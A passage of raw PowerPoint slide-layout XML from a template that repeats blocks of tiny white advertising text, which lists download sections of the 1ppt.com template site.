              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout202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02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02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02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0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03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03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03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03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03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03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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout203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03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03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03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0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04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04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04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04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04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04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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout204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04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04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04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0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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
